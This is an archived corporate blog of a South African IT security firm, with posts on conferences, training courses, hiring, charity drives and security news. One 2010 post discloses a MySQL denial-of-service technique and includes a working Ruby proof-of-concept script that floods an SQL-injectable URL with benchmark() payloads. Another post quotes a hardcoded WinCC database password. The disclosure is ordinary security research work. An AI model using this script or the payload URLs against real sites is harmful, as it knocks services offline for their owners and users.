Telspace Systems, The Blog

hackZA Security Conference - Registration now OPEN!

2012-01-19T14:43:00.002+02:00

Telspace Systems is proud to announce event sponsorship of hackZA 2012, the information security conference to be held in Johannesburg, South Africa.

The purpose of the hackZA 2012 conference is to provide a platform and playground where international speakers are brought to South Africa to present their ground breaking research with no boundaries or vendor intervention.

Speakers are brought out to Johannesburg to present their training and talk topics to educate an audience which would not be able to attend other international conferences due to finance restrictions and so forth. hackZA is a technical conference where local residents can engage with speakers, learn from them and be entertained.

Confirmed international speakers and topics are as follows:

* Julio Auto (Brazil) Playing with x86 code normalization
* Joe McCray (USA) - You Spent All That Money And You Still Got Owned???
* Jayson E. Street (USA) - Steal Everything, Kill Everyone, Cause Total Financial Ruin!
* Hemil Shah (India and SA) - Penetrating Mobile Applications - Attacks & Exploits

The conference will be held in Johannesburg, South Africa during April 2012. The dates are the 2nd and 3rd April 2012 for technical training and 4th April 2012 for a single track highly technical conference.

International training courses are as follows:

* Hemil Shah – Web Application Security – Threats and Countermeasures
* Joe McCray – Advanced Penetration testing
* Dino Covotsos – Hacking Wireless and Bluetooth 101

If you would like to attend please register on www.hackza.com .

Happy New Year from Telspace Systems!

2012-01-01T15:00:00.000+02:00

It's the very first day of 2012, and we want to take this opportunity to wish you all a very happy New Year.

2011 was by far our best year ever! We managed to cram in so many amazing opportunities of presenting and training internationally, including places such as Dallas, Miami, New York and Rwanda! We really wouldn't' have been able to do any of this without the support of a great number of people.

I want to thank our entire team for all their hard work during 2011, you are the people that make Telspace Systems run day to day and assure our clients of world class services. Hardly anyone actually see's the amount of real hours you put in and I would like to personally say thank you for going above and beyond.

Most of all I want to thank our loyal customers and friends who are the real reason that we are still in business and are able to produce such interesting work. Thank you for everything!

We've really enjoyed a huge amount of growth and support during 2011 and I am positive that 2012 will be a bumper year for us. We have huge plans for 2012, just watch this space!

On behalf of everyone at Telspace Systems I would like to wish you all a very happy New Year! We look forward to being of service to you.

Santa Shoe Box - Feedback

2011-11-29T14:33:00.001+02:00

The Santa Shoe Box drive is over and we are pleased toannounce it was an incredible success as approximately 70 489 Boxeswere collected.

Year on year we are pleased to be seeing an increase in thenumber of participants, it’s great to see how many people are willing to assista charitable cause such as this.

We would like to thank each and every person who contributedto this worthy cause and made it a Christmas to remember for tens of thousandsof underprivileged kids.

We are looking forward to being part of a bigger target nextyear , as well as seeing an exponential growth in the number of participants.

Hacker Halted - Miami 2011

2011-11-17T15:09:00.001+02:00

After a successful Wireless and Bluetooth Hacking 101 course presented at TakeDownCon in Dallas(USA) earlier this year, Telspace Systems was invited to present and train students at the well known Hacker Halted in Miami, during October 2011.

Our training class was very well attended by many Military(Defence) and Banking clients. We recieved fantastic reviews of our class and after generating statistics, we are extremely happy with the outcome of maintaining high quality training worldwide.

Statistics are as follows:

Hacker Halted in Miami was an extremely well attended conference which was well organised. The conference itself featured many international "superstars" from the information security arena and completely exceeded our expectations(which were already high because of TakeDownCon).

A big thank you to the entire crew that organised everything for us in Miami(Joyce and Leo, thanks!).

We look forward to seeing all our friends(and now family) at Hacker Halted next year!

IT Security jobs- August 2011

2011-08-02T13:29:00.003+02:00

In this ever-changing industry comes a passion and desire to learn. A vast majority of companies are looking for talented professionals to fill a void within their organisation, in order to stay abreast of the swift changes experienced daily.

The difficulty experienced in filling the gap comes down to three basic elements – timing, shortage of skills/experience and awareness. Many employees in various positions have basically picked up the skills very early on and grown within the industry from the beginning of their careers.
The trend we have identified and followed, illustrates hard evidence of an active market and a lack of awareness.

We are here to fill that gap.

We have various IT Security related vacancies available on a national scale with incredible clients, a few of which are as follows:

Should you be interested to see what is available or you are possibly looking for a fresh challenge, please send us your CV or contact us via email at shaun[@]telspace.co.za

Should you be looking for top notch talent for your business, we have an extensive database of able and willing candidates to fit your requirements.

Telspace Systems invited to train at first-ever TakeDownCon

2011-06-15T23:14:00.005+02:00

Telspace Systems was invited to present its Wireless & Bluetooth Hacking 101 training course at the first-ever TakeDownCon in Dallas recently.

The conference, which took place between 14-19 May 2011, was the first of the EC-Council’s new technical IT security conference series.

“We are privileged to have had the opportunity to train students at this new security conference series,” says Dino Covotsos, CEO of Telspace Systems.

According to feedback reports, the training course was very well-received by the students, the majority of which were from the US government. “The course was fantastic . It was very fast-paced and in depth. It provided a great learning experience,” was one of the comments received by a student.

Student feedback was as follows:

The Wireless & Bluetooth Hacking 101 course ran over 2 days after which each student went home with a brand-new iPad 2 device.

Says Covotsos, “The training was truly exceptional, and we got a large amount of new business interest and networking contacts as a result. It was an honour for Telspace to be recognised alongside international IT training providers.”

Other types of training available included ethical hacking, penetration testing, digital forensics and application security.

Also at TakeDownCon, Rodrigo Rubira Branco, The Director of Vulnerability Malware Research at Qualys and founder of the Dissect || PE project, did a presentation on automated malware analysis, which is currently considered to be the top trend in the security industry. We recommend you check out his presentation and slide deck at the TakeDownCon website.

SpeedHack @ TakeDownCon, a brand new hacking competition designed just for registered TakeDownCon attendees, took place on the evening of 17 May. Watch out for some new exciting developments with hacking competitions worldwide.

Coming up

Telspace Systems has been invited to offer its Wireless & Bluetooth Hacking 101 training course at two other associate conferences, namely Hacker Halted - Miami at the end of October 2011, and TakeDownCon Las Vegas in December 2011.

“It bodes well not only for Telspace Systems, but for South Africa if we are recognised at these types of international conferences,” says Covotsos. “International trends are usually ahead of local ones – and it helps us and our clients to travel abroad like this so that we can bring back home the knowledge we gained, and share it with the local industry.”

TakeDownCon website: http://www.takedowncon.com

Telspace represents at the ITWeb Security Summit 2011

2011-05-23T10:49:00.006+02:00

Telspace Systems, for the first time, exhibited at the ITWeb Security Summit 2011 in the form of the prominent stand 14.

It was a successful two days, the hype amongst our stand proved that the industry is gearing towards something big and electrifying for the future of IT Security. We were excited to have met some new faces as well as some of the leading minds in the industry. We also had the opportunity to showcase our new Recruitment division, which had a great response and the spinoff is beginning to show.

We would like to take the opportunity to thank all that attended and visited Telspace Systems, the responses were phenomenal and the stats look good. We are looking forward to meeting you all again very soon J

Congratulations to Edith Ngoetjana from FNB for winning the draw for the Playstation 3, Enjoy it! I wouldn’t recommended joining the PSN though ;)

Congratulations to Simphiwe Mayisela from T-Systems for winning the Web Application Hacking 101 training, valued at R7490.00 ex Vat. We hope that you find it to be very rewarding.

Telspace Systems' new recruitment division addresses IT security skills scarcity

2011-05-08T21:39:00.001+02:00

Telspace Systems, a leading IT security solutions provider for both local and international markets, is expanding its services to include a security-focused skills recruitment division.

The company has identified a growing shortage of specialised and highly-skilled individuals in the market, which is having a negative effect on local companies' level of security.

Says Dino Covotsos, CEO of Telspace Systems: “The apparent lack of available security skills is becoming a growing concern for businesses. As cyber threats increase in sophistication, so should the systems that protect companies against them. We are seeing more and more that there are simply not enough highly-skilled individuals to ensure that these critical systems offer adequate protection.”

Telspace Systems' new division aims to provide companies with candidates that can effectively address business security concerns based on skill level, experience and knowledge. “Limited skills often mean limited protection, and businesses need to understand the risks they face if they do not implement adequate protection,” says Covotsos.

Telspace Systems will be at the ITWeb Security Summit 2011 on 10-11 May at the Sandton Convention Centre, where it will highlight its new division to delegates. Visitors will have a chance to interact with the team and learn more about the types of skills, the industry needs and what is currently available.

This turnkey operation is the first of its kind, and given the company's industry knowledge, research and experience, it will be able to provide top talent and opportunities to many organisations and skilled security candidates respectively.
“We are very excited about our new service offering and that we are able to bolster the level and quality of security for companies,” Covotsos concludes.

Going forward, the company has plans to expand its IT security recruitment service internationally, and depending on market indications, begin offering other much-needed specialised IT skills as well.

For any enquiries, please feel free to contact Telspace Systems' Recruitment Director Shaun Levy at (011) 875 4319 or email shaun[at]telspace.co.za

Web Application Hacking 101

2011-04-08T00:32:00.004+02:00

Telspace Systems presents our Web Application Hacking 101 course during June 2011.

Click here for more information.

This course is aimed at developers, IT security staff, technology enthusiasts and web application specialists. Book multiple students and you will automatically qualify for a discount! We look forward to seeing you there!

Takedowncon USA

2011-04-05T00:31:00.004+02:00

It is with great pleasure that Telspace Systems presents training at the internationally recognised TakeDownCon, to be held in Dallas, USA.

Telspace Systems will be holding a 2 day training session during May 2011.

More information can be found at:

http://www.takedowncon.com/?page_id=753

In addition, if you sign up now you can get a FREE IPAD for attending our training session.

We hope to see you there!

Training Feedback

2011-03-23T13:00:00.004+02:00

Telspace Systems successfully completed another training session last week at the FNB training centre in Sandton, Johannesburg.

We would like to thank all the candidates for coming through and working hard to get through the 2 day course, I trust you all found it very valuable.

Please find the public feedback for our course as per below, the course was very well received by all candidates.

Breakdown of Candidate responses:

Overall Training Feedback:

We look forward to presenting this course again during June 2011.

See you there!

Telspace Sponsors ITWeb Security Summit 2011

2011-01-31T21:52:00.005+02:00

Telspace Systems is proud to announce that for a second year running, we will be a sponsor of the ITWeb Security Summit 2011.

This conference will be held in Johannesburg, South Africa. This event is undoubtedly the largest security conference in South Africa and is attended by most major companies and government departments in the country.

Get more information about the sponsors here:

You can get more information about the security summit here:

We hope to see you all there!

Wireless and Bluetooth Hacking 101 - March 2011

2011-01-12T12:49:00.003+02:00

We are very excited to announce that we will be running our Bluetooth and Wireless Hacking Course during March 2011!

We are running a very special offer: If you send 2 candidates, a 3rd can attend for free! Not to be missed! If you are a ISG member in South Africa, you will also qualify for a further 10% discount.

Venue: The FNB Conference Centre – Sandton
Costs: R7490.00 excluding VAT per person
Dates: 16th & 17th March 2011

Please see course details above or visit our website for more info: http://www.telspace.co.za/wireless%20and%20bluetooth%20hacking.html

Email us at info@telspace.co.za for bookings.

Looking forward to seeing you there!

Happy Holidays!

2010-12-14T12:40:00.000+02:00

To all our Valued Clients and Friends,

The holiday season is a wonderful time for us to remember the friends and customers who help our business and make our jobs a pleasure all year long. Our business would not be where it is today without your continued and loyal support.

We'd like to take this opportunity to thank you and send our best wishes to you and your families. May your New Year be filled with all the success and happiness that you deserve.

This year has been an extremely busy year for us. Reflecting back on some of the highlights of the year shows us that we have been very fortunate to have spoken and trained at several well respected conferences including Hack in the Box Dubai 2010, IIR in Rosebank and ISSA in Sandton. We were also fortunate enough to have been a sponsor of the ITweb Security Summit 2010.

In terms of giving back to the underprivileged, Telspace Systems got involved in Johnny Long’s Hackers for Charity, Nadia Van Der Merwe (FHM) Charity event in association with Lory Park Zoo and our entire Telspace Systems team helped needy children with the Santa's Shoebox Christmas charity drive – where we provided underprivileged children with the basic necessities and Christmas presents.

From all of us at Telspace Systems, thank you for your loyal support, may you have a safe and restful holiday season.

IIR Conference

2010-11-12T13:49:00.004+02:00

The International Institute of Research's (IIR) IT Risk Management Conference was held this week in Rosebank on the 10,11 & 12th November 2010.

Telspace Systems was invited to present their popular "Next Generation BotNet" talk which was very well received. Telspace is honoured for the opportunity to have spoken at the IIR conference and is looking forward to the next IT Risk Management Conference.

The "Next Generation BotNet" is available for download on our site. http://www.telspace.co.za

Telspace will also be running the highly recommended Bluetooth & Wireless Hacking Course at the end of November. For more information or any queries please email info@telspace.co.za

Bluetooth and Wireless Hacking 101

2010-11-10T14:16:00.004+02:00

We are very excited to announce that we will be running our Bluetooth and Wireless Hacking Course at the end of November this year!

We are running a very special offer: If you send 2 candidates, a 3rd can attend for free! Not to be missed!

Venue: The FNB Conference Centre – Sandton
Costs: R7490.00 excluding VAT per person
Dates: 25-26th November 2010

Please see course details above or visit our website for more info: http://www.telspace.co.za/wireless%20and%20bluetooth%20hacking.html

Looking forward to seeing you there!

MySQL query timeout remote Denial of Service

2010-09-30T09:57:00.002+02:00

Tiago Ferreira, a senior security analyst at Telspace Systems, recently stumbled on a vulnerability in Mysql during a Penetration test for a client.

Due to the lack of execution limit time (query timeout) for queries, it is possible to force the MySQL to process a certain query for a determined amount of time (hours/days). The processing time will depend on the hardware resources (cpu, memory) available at the server.

The MySQL has a system variable that defines the maximum amount of connections that can be made simultaneously (max_user_connections) for the daemon. For instance, if this variable is configured to “max_user_connections=100, the MySQL will just allow that 100 simultaneous connections be processed. If a "101" connection is attempted, the daemon will answer with the message *Too many connections*, so that no other requirement be processed while the connections are active.

The benchmark() function can be used to "hold" a determined connection for a certain time interval. For instance:

mysql> select benchmark(500000,sha1('A'));
+------------------------------+
| benchmark(500000,sha1(0x65)) |
+------------------------------+
| 0 |
+------------------------------+
1 row in set (1.11 sec)

When running the benchmark() function, as illustrated, it is possible to verify that the MySQL took about 1.11 seconds to process the query, which means it "held" the connection for a period of 1.11 seconds.

If the value referring to the number of processing times of the benchmark() function is increased, the total processing time will, therefore, increase.

mysql> select benchmark(500000000,sha1(0x65));
+---------------------------------+
| benchmark(500000000,sha1(0x65)) |
+---------------------------------+
| 0 |
+---------------------------------+
1 row in set (12 min 5.06 sec)

The processing of the benchmark() function above took 12 minutes to be executed.

As this function does not have limits for the amount of times necessary to process certain task, it is possible to increase this number to an extremely high value, so that one or more available connections be occupied for a long period of time.

To cause a denial of service, multiple simultaneous connection queries are sent, to fill all the available slots in the MySQL(defined in max_user_connections) and maintain these connections busy with the benchmark() processing. This way the following connections will not be processed by the daemon.

To force the MySQL into processing a query for a lot of hours/days, the following query can be sent:

select benchmark(9000000000000000000000000000000,ENCODE(0x65,0x65))

The native function ENCODE() takes about 4 times more to be processed than the sha1() function, and soon was chosen to "hold" the MySQL connections. During the tests made with the daemon, it was noticed that the cpu processing was kept at an average 98%, also denying new connections to the data base. To establish the normal functioning of the daemon it was necessary to restart the MySQL.

The same kind of tests were made in the Microsoft SQL Server 2005, using the function *waitfor delay*, but it didn't appear to be vulnerable because the error message "Query timeout expired" was shown and the connection allowed, which means the MSSQL has a query time checking native algorithm.

The impact caused by the exploration of this vulnerability is more critical when done remotely against Web applications vulnerable to a SQL Injection or Blind SQL Injection.

For instance, an e-commerce site using the MySQL to storage data (products, prices, clients, etc.), can have it's services interrupted. The URL example below is responsible for seeking at the data base the product identified by the parameter id=100 and show them to the user.

http://e-commerce.example.com/products.php?cat=2&id=100

An attack scene for denial of service would be to send the following query several times.

http://e-commerce.example.com/products.php?cat=2&id=100+select+benchmark(9000000000000000000000000000000,ENCODE(0x65,0x65))%23%23

As a proof of concept a ruby script was developed to exploit this vulnerability, in the case of a Web application is vulnerable to SQL injection.

#!/usr/bin/ruby
#Telspace Systems - www.telspace.co.za - info[@]telspace.co.za

require 'net/http'
require 'uri'
require 'optparse'

# Command line options

options = {}
OptionParser.new do |opts|

options[:url] = nil
opts.on('-u', '--url',"Specify an URL vulnerable for MySQL Injection\n\n") do
options[:url] = ARGV[0]
end

end.parse!

# HTTP config

if options[:url] != nil
$base_url = options[:url].match(/http:\/\/(.*)\//).to_s
$vuln_param = options[:url].scan(/\/\/[^\/]*(.*)/).to_s

else
puts "\tUse -u or --url to specify an URL vulnerable to MySQL Injection\n\n"
exit

end

# Attack config

threads = 500
$payload1 = "+and+(select+benchmark(9000000000000000000000000000000,sha1(sha1(0x65))))%23%23"
$payload2 = "'+and+(select+benchmark(9000000000000000000000000000000,sha1(sha1(0x65))))%23%23"

# HTTP interface
def build_http_request()
begin
uri = URI.parse($base_url)
request = Net::HTTP.new(uri.host,uri.port)
rescue Exception => error2
store_logs = error2.inspect
return request
end
end

# Send multiples requests

1.upto(threads){|i|
threads = Thread.new do
puts "Send request " + i.to_s
request = build_http_request()
request.request_get($vuln_param+$payload1)
request.request_get($vuln_param+$payload2)
end
}

IIR Conference 2010

2010-09-08T16:02:00.010+02:00

Telspace Systems have been invited to present their 'Next Generation Botnets' talk at The Institute for International Research's (IIR) IT Risk Management Conference on 10^th October 2010 at the IIR Conference Center in Rosebank, South Africa.

“IIR’s IT Risk Management Conference will explore the challenges and current risks facing the IT Professional in the South African market and provide up-to-date techniques and experiences in assessing and averting risk. The expert speakers featured at this event come from a variety of sectors and are industry leaders in their respective fields, providing you with specialist and practical advice.”

Some of the other presentations that we are looking forward to includes:

· Cloud Computing and its impact on IT Risk Management.

· An investigation into the use of social networking sites by employees and the effects on your IT Security.

· How to secure your organisation in the event of disaster.

· The security and risk implications of importing software.

· Implementing an IT Risk Management policy to safe guard against internal risks.

Telspace Systems is also pleased to announce the launch of their new & updated website http://www.telspace.co.za

ISSA 2010

2010-08-06T15:13:00.002+02:00

It’s been a while since I last posted on the blog; this is thankfully due to how busy we have been on this side.

This week Telspace Systems presented at the prestigious ISSA 2010 conference held at the Sandton Convention Centre in Johannesburg, South Africa.

Telspace Systems presented on Next Generation Botnets, Our talk should be available soon for download via their website at www.infosecsa.co.za . The talk was very well received and we have been invited to present at a few other universities in South Africa later this year. I can also highly recommend attending net year’s ISSA conference due to the level of expertise of the talks as well as the general atmosphere.

Amongst the list of headline speakers was Craig Rosewarne. Craig presented a great talk on the trends of information security and whats in store for us in the future in South Africa. His talk took a broad view at South African history and compared it with information security as a whole. This is definitely a talk worth reviewing and I do recommend a revision of his slides.

We have a lot of news coming up at Telspace Systems so I’ll definitely try updating you as much as possible in between the huge projects that we have at the moment.

Be safe and keep well.

Just a few notes about a new 0-day vulnerability for our clients...

2010-07-21T21:15:00.004+02:00

After the notorious Adobe Flash 0-day that put the security community on alert at the end of May, it is now time for a new vulnerability to steal the thunder. A few days ago Microsoft has released a security advisory (2286198) warning his costumers about a critical security flaw. As detailed on the advisory, all maintained version of Windows Operating System are affected by the issue. Other areas confirm that other non-maintained versions of the operating system like Windows 2000 SP4 and Windows XP SP2 are still affected.

This vulnerability, cataloged as CVE-2010-2568, lies on the Windows Shell component and occurs due the incorrectly way Windows parses shortcut references (files containing the .lnk extension). The advisory also details that it is possible to take advantage of this flaw in a malicious way to allow remote code execution.

As reported on June 16th by the MPCC (Microsoft Malware Protection Center), a worm called Stuxnet that takes advantage of this vulnerability was already being monitored and is suspected to be spreading in the wild for at least a month, possibly longer. According to them, USB removable devices are the main instrument used in order to propagate it, but other infection mechanisms could also be used as Windows file shares and WebDav.

According to Chester Wisniewski, the flaw occurs when shell32.dll tries to load control panel icons from applets. It is possible to create a specially crafted shortcut that points to a malicious file. That way, when the folder gets displayed (using Windows explorer for example) the LNK file will be charged to load and execute the malicious payload. Notice that the .lnk file just carries the exploitation/infection vector that leads the drivers to be executed.

As pointed out by Chet on the same SophosLabs blog post, the analysis performed against an infected USB device containing the malicious code shows that the crafted shortcut file loads two drivers: mrxcls.sys and mrxnet.sys.

These two drivers basically consist of a rootkit and once executed it installs a backdoor on the system, hides the presence of malicious files on the removable USB device and injects encrypted data blobs that seems to serve to the basic rootkit infrastructure.

What has raised special attention is that these drivers were signed using a private key that belongs to Realtek Semiconductor Corp. a well known IC design and peripheral manufacturer company. This characteristic let the drivers to run unnoticed, without causing any warning to be exhibited to the user. How the attacker(s) manage to get their drivers signed by Realtek is still unknown.

The MMPC teams have worked together with VeriSign and Realtek to revoke the certificate and issue a new one. Although, according F-secure it is still possible to use the certificate due the countersignature method of time stamping that allows signatures to be verified even after the certificate has expired or been revoked.

Looking at the malware behavior, Frank Boldewin found some database queries that target the Siemens SIMATIC WinCC SCADA system, a computer system used to control and monitor critical infrastructure operations such the ones performed in power plants and large communication systems. According the Slashdot post the product uses a hardcoded username and password to access its database system (Server=.\WinCC;uid=WinCCConnect;pwd=2WSXcder).

When you don't work for a company that operates critical infrastructure services you should not be worried about the malware it in the first place. But since a proof of concept code was released on exploit-db.com on June 18th, we can expect more payloads to emerge and ends up being triggered by the LNK vulnerability.

Another important thing to mention is that a lot of questions are raised up these days concerning AutoRun and AutoPlay. As described on Seans post at F-Secure Weblog, the vulnerability could be exploited even if AutoRun and AutoPlay are disabled. However, as happened with the Conficker, these features could be used to trick a user and get the code executed, but it is definitely not required. In order to get the payload executed it is just necessary to display the folder content with the crafted LNK file inner in.

In order to mitigate the issue until Microsoft properly releases a patch some workarounds were proposed as disabling the displaying of icons for shortcuts and disabling WebClient service, more details about how to perform such operations could be checked on the Microsoft Advisory (2286198). Other solution as proposed on the SophosLabs blog post involves the deploy of a GPO (Group Policy Object) disallowing the use of executable files that are not on the C: drive which I believe is the best way to mitigate the problem until the patch is released.

More information about this malware could be verified on the Chet post including a video demonstrating the attack and in the PDF document wrote by Kupreev Oleg and Ulasen Sergey from VirusBlokAda, a Belorussian based company who first discovered and analyzed the exploit.

Hello world!

2010-05-28T09:20:00.003+02:00

Hi, my name is Gustavo and I have joined the Telspace Systems crew as a senior security analyst at the beginning of May.

Now you should probably be asking yourself.. Who the hell is Gustavo? Who cares about him anyway =]

Well, one of my first activities here at Telspace requires me to write a blog post introducing myself. I am definitely not good with blog words, but I will try to make things painless and quick for everyone who is interested.

I am from Brazil... hope this fact waivers a presentation about being a soccer fanatic (in a good way) and my expectations regarding 2010 world cup hehe. As i was saying, I am directly involved in computer security for 10 years now. I have spent the last 4 years working for a market-leading security company here in Brazil performing penetration tests and security assessments for brazilian government and other high profile customers. Furthermore, I am very happy to have joined the Telspace crew and I am very excited about my work here. I will also be in charge of heading up expansion in Brazil, adding to all of Telspace Systems Brazilian clients.

Feel free to contact me to share and discuss computer related stuff, or just to chat about any subject of mutual interest =]

By the way, my new, fancy mail is: gustavo *DO_NOT_SPAM_ME* telspace dot co dot za

Welcome Gustavo...

2010-05-19T16:14:00.002+02:00

It was great to catch up with many friends and collegues at this years ITWeb Security Summit in Johannesburg. As one of the sponsors of the Security Summit, I trust that you enjoyed the 2 day conference and gained some value out of it. I look forward to some of your feedback and comments regarding it.

Telspace Systems has had some busy and exciting months this year. Our Web Application Assessment and Attack and Penetration testing side has grown in leaps and bounds. Due to this, we have hired 2 more staff to come on board our team. It's important to keep you up to speed with what's happening here, since we are experiencing a rather large amount of change and growth recently.

Gustavo Pimentel Bittencourt has been hired as one of our new senior security analysts. Gustavo will be assisting our clients in providing very high level, web application assessments and infrastructure penetration testing. Gustavo was a scholarship holder of CNPq (Brazilian National Council for Scientific and Technologic Development) working as intern researcher at C.E.S.A.R. (Center for Studies of Advanced Systems of Recife), a well-known research and software development center in Brazil. Gustavo has presented at many international conferences and has also provided training worldwide at various international conferences. Since joining our team in April 2010, Gustavo has completed a number of high level assessments for our clients.

We're always looking for exceptional talent, if you feel you have what it takes please send us an email with your CV.

Telspace Systems will also be running Web Application Hacking 101, one of our most popular courses during July 2010. If you're interested in attending, please contact us.

HITB and more...

2010-05-05T13:21:00.003+02:00

Telspace Systems had a successful visit to Hack in the Box 2010 (HITB) Dubai, despite the ash cloud putting a bit of damper on the number of attendees :) . The HITB guys didn’t let it get in the way of presentations, though, as they set it up so that the speakers’ could do talks remotely(and completely legally in terms of UAE specs). Very clever I must say!

Andries was great in his contribution to the Wireless and Bluetooth Hacking 101 training session and we received great feedback from our attendees about the course. In terms of the other talks at the actual conference, they were definitely of international standard and a great refresher at many of the critical issues which still seem to be very prominent in our industry.

Andries and I both agreed that Mr Shah’s talk on Web Application Hacking was the most interesting, as it is a space which we are very active in. Mauriano’s SAP vulnerabilities talk and his discussion around SAP’s testing framework (bizsploit) was also very informative. In terms of our talk, it was extremely well received by the audience and we have had very positive feedback. You can download our slides from here or from the hitb website directly.

We met up with a lot of old friends and the networking opportunities were great(watch this space in the future) – we look forward to seeing many of our peers at HITB Amsterdam(Hopefully) later this year.

Back on home-ground, last week (28th April 2010) we presented at the Information Security Group of Africa (ISGA) HITB feedback session. It was great to share some of our Dubai experiences with the local guys. You can download our feedback presentation at http://www.telspace.co.za/isgfeedback.pdf .

Coming up, we have the Security Summit to look forward to next week. Telspace Systems has a corporate sponsorship at the event, and we’ll be there to chat, mingle and network. Mr Shah will be there too, so you must all go and check his talk out. What he says is very relevant locally and internationally.

Have a great week everyone. Keep checking out our blog, more exciting news coming soon....

Telspace sponsors beauty and the beasts

2010-03-29T23:39:00.002+02:00

Bet you’re thinking... wtf? Well, good, coz we need your full attention. Telspace is doing something a little different in terms of ‘giving back’ this year, and you can help us, so listen up...

Animals have always been close to my heart and I’ve been looking for a while now for worthwhile project where I can feel we are truly making a difference in some of their lives.

Nadia van der Merwe, one of FHM’s shortlisted 100 Sexiest Women, is running a campaign for animal charity and came to us as a sponsor. Well, how we could refuse?

She’s calling it Nadia VDM’s Proudly South African 100 Sexiest Campaign. The way it works is the more votes she gets, the more money that will be donated to charity – Lory Park Zoo, in this case.

Last year, Nadia was voted 16 out of the 100 sexiest women in the world. This year, for every position she climbs in that ranking, Telspace System will donate R1000 to the zoo.

So how did this campaign come about? According to Nadia she wanted something more ‘proudly South African’ to represent her FHM photoshoot this year, especially with all the current focus on the World Cup. After targeting the Big 5 as her theme, Nadia did her ‘shoot incorporating the animals.

So guys, please – go to the FHM website(www.fhm.co.za) and vote for Nadia van der Merwe. If helping out animals is not your thing, its worth it just to go see some of her incredible photos online.

P.S.

Telspace Systems has sponsored a party for Nadia van der Merwe at Latinova in Rosebank, JHB this coming Saturday evening. This includes a fashion show with Nadia - Sporting our leet Telspace Systems gear. Be there!

See you at HITBSecConf2010!

2010-03-18T12:38:00.002+02:00

We’re excited to not only be presenting, but training at this year’s Hack in the Box conference, which takes place in Dubai from 19-22 April. Our talk will be focused on next generation botnets, and what kind of power they give to botmasters. Furthermore, we’ll be demonstrating how DNS is used to evade CNC control take down, and explore the recent iPhone botnet and the malicious worms that followed its discovery.

We will also be doing our popular Wireless & Bluetooth Hacking 101 course, which most of you have probably already heard of. It will be Telspace security analyst Andries Burger’s virgin trip to Hack in the Box – and his first time helping us with the training. We are all pretty eager to see how he takes it all...

If you can’t make it out to Dubai this year, don’t be too bleak – we’re going to be doing some cool things right here in sunny SA in April as well.

First off, we’ll be presenting our feedback talk at the Information Security Group of Africa’s HITB feedback session at the end of April.

And for those of you who have not yet been to one of our Wireless & Bluetooth Hacking 101 courses, you’ll have a chance to on 11-12 April when we will be offering training in Sandton.

Thank you all again for your continued support – it is your interest that allows us to participate in high-profile events such as Hack in the Box in the first place. Hope to see you all there!

Telspace is hiring (again...)

2010-02-18T01:30:00.003+02:00

The past few months have been rather chaotic at Telspace Systems. Therefore, its time (once again) for us to look at hiring a few more security analysts for our unique Telspace team.

We're looking for extremely skilled security analysts (especially on the web application hacking side) who are passionate about information security, enjoy intense challenges, can work in an informal environment and have quite flexible time in their daily lifestyles. A major plus would be having some sort of Foosball skills.

If you think you have what it takes or that you might know of someone who makes the cut, please forward details on to us as soon as possible so that we can meet up and chat.

Take care,

Google buzz privacy flaw.

2010-02-12T16:58:00.002+02:00

By now you have probably heard about Google Buzz. A new social networking service brought out by Google, allowing users to share updates, photos and by the looks of it your entire contact list and anyone you have emailed. It also encompasses factors from the well known Twitter and Facebook. With all new services, security factors are an issue and Google buzz is no different. A rather serious privacy flaw lies in it, exposing all your contact addresses and people you have emailed.

Once in google buzz you have a prompt with the following "You're already set up to follow the people you email and chat with." So by simply emailing someone you will now be "following" them and they will have access to you contact list.

One of the main issues being discussed about Google buzz is the automatic opt-in, in a sense forcing users into using the service. Then publicly disclosing your email and contact list, leaving your email open to spammers. All and all a bad move from Google. They seem to be taking a quick and serious response to the issues, with a couple fixes being brought out already.

However in the mean time google is asking for feedback, and you can give yours here: http://mail.google.com/support/bin/request.py?contact_type=buzz

In other news our submission wasn't accepted for the local security summit, yet the talk has been internationally accepted. We can understand and wouldn't want to side track the vendor talks and actually get some technical talks in there anyway. ;)

UPDATE: Well, Google has listened to everyones feedback and already fixed a number of the issues. For more info please read here.

Another post... finally.

2010-02-02T18:19:00.003+02:00

Hi all, First off apologies for the rather dormant blog lately. Things have again gotten pretty chaotic on our side. The good kind of chaos though. We however are going to keep more posts coming your way.

For the year ahead we have already got a couple trips to Dubai and possibly Amsterdam planned. Although Dino might make me sign a few more NDAs before we head there. We also have a number of projects lined up which we will do our best to keep everyone up to date on. We wish you all the best for the year ahead.

A new addition to our team

2009-09-09T21:07:00.003+02:00

Telspace Systems would like to congratulate and welcome Andries Burger. Andries beat some stiff competition and he has come on board the infosec team as a Junior Security Analyst. We wish you a warm welcome!

For our clients this new addition to our dedicated team brings some new knowledge and better service delivery to our clients.

Telspace Systems is always looking out for new talent and we are currently in the process of hiring even more analysts, if you think you make the cut please contact us.

1995 all over again.

2009-09-09T15:32:00.003+02:00

Last night an exploit was released affecting all Windows7 and Vista(Fully patched) servers. We have also confirmed in our lab that this exploit also works against windows server 2008.

The exploit allows for remote denial of service attacks against any of these server.

The bug lies in the SMB2.0. ( http://securityreason.com/exploitalert/7138 )

Microsoft has recommended that that the SMB port(445) be blocked until Microsoft releases a patch.

More can be read here: http://www.microsoft.com/technet/security/advisory/975497.mspx

Telspace to present at Itex - Botswana

2009-07-24T17:31:00.002+02:00

Telspace CEO Dino Covotsos and Senior Security Analyst Charlton Smith will be keynote speakers at this premier IT conference in Botswana which takes place between the 30th of July and 1st of August 2009.

About Itex

The new-world economy is based on globally networked information systems. Information today is the currency for a knowledge economy geared towards development.

The Information Technology Exhibition (ITEX) is prudently crafted for exhibitors to showcase the latest technologies in the areas of Business Solutions, Telecommunication, Communication and Consumer Electronics. It also avails an opportunity for descision makers to learn about current technologies.

Green Dam hackers.

2009-06-15T13:32:00.001+02:00

The Chinese government has mandated that all computers in the country must have the screening software installed.

This obviously bring about many security issues, such as - if the applications installed are not secure? This could leave the whole of China exposed to being compromised.

Security doesn't seem to phase the government too much. We have already seen an exploit released for one of the applications to be installed(released 2009-06-12) Green Dam.

The Green Dam software filters content by blocking URLs and Web site images and by monitoring text in other applications.

From Exploit:

"Green Dam is a software used for monitoring and anti-pornography, popularizing by Chinese goverment. After July 1st, it will be forced to install on all new Chinese PCs. Now it already has 50 million copies in China.

In order to monitor the URL that user is exploring, Green Dam injected the browser process. When Green Dam is trying to handle a long URL, a stack overflow will occur in the browser process.

This exploit can be used for exploitation on IE, on those computers installed Green Dam. I used the .net binary to deploy shellcode, for it`s more stable than Heap Spray, and able to bypass DEP and ASLR on Vista."

*sigh*

In other News Dino and I will be going through to Botswana next month, to keynote at a conference. We will provide you with more information soon.

Take care.

About time!

2009-05-18T15:35:00.002+02:00

First off, apologies for not updating the blog in a while. Things have been rather hectic here :)
